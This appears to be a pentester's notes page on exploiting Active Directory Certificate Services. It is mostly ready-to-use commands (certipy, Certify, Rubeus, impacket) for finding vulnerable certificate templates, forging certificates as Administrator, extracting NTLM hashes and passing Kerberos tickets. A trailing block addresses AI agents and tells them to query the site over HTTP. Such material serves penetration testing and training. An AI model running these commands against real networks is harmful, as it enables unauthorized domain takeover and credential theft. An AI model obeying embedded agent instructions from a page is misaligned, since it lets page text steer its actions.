# Certificate Authority (CA)

## Enumerate CA for vulnerabilities

{% embed url="<https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation>" %}

Some certificate templates can be vulnerable to injection.

```
#Using certutil we can list templates
certutil -v -dstemplate

#Using certify.exe (locally)
.\certify.exe find /vulnerable

#Using certipy (remotely)
python3 certipy find -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128
```

## Exploiting misconfigured templates

Request a certificate from a vulnerable template:

```
// Using certipy
python3 certipy req <domain>/<user>:<password>@<ca_server> <ca_name> -template '<vulnerable_template_name>' -alt '<target_user>'

// Using certify.exe
.\certify.exe request /ca:<server>\<ca-name> /template:"vulnerable_template_name>" /altname:"<alt_name>"
```

## PKI admins group

If you are in the PKI admins group, you are able to create a vulnerable template and impersonate Administrator.

First create a new template by using the powershell module <https://github.com/GoateePFE/ADCSTemplate>

```
Import-Module .\ADCSTemplate.psm1                             
New-ADCSTemplate -DisplayName Incendium -JSON (Export-ADCSTemplate -DisplayName "Subordinate Certification Authority") -publish -Identity "DOMAIN\PKI Admins"
```

Next we request the template as Administrator:

```
certipy req -username incendium@domain.local -password PASS123 -ca domain-DC01-CA -target dc.domain.local -template Incendium -upn Administrator@domain.local -dns domain.local
```

Now we can use the PFX output file to retrieve the NT:NTLM hash of administrator by using:

```
certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.1.10 -username 'Administrator' -domain 'domain.local'
```

## Convert PEM to PFX

```
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

## Request ticket&#x20;

```
# Request the TGT
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
# if you gave the password for "cert.pfx", you need to specify the password
Rubeus.exe asktgt /user:Administrator /password:password123 /certificate:cert.pfx /ptt
# or output the file
Rubeus.exe asktgt /user:Administrator /certificate:<Thumbprint> /outfile:ticket.kirbi
```

## Pass the ticket

```
impacket-ticketConverter ticket.kirbi ticke.ccache
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.incendium.rocks/pentesting-notes/windows-pentesting/certificate-authority-ca.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.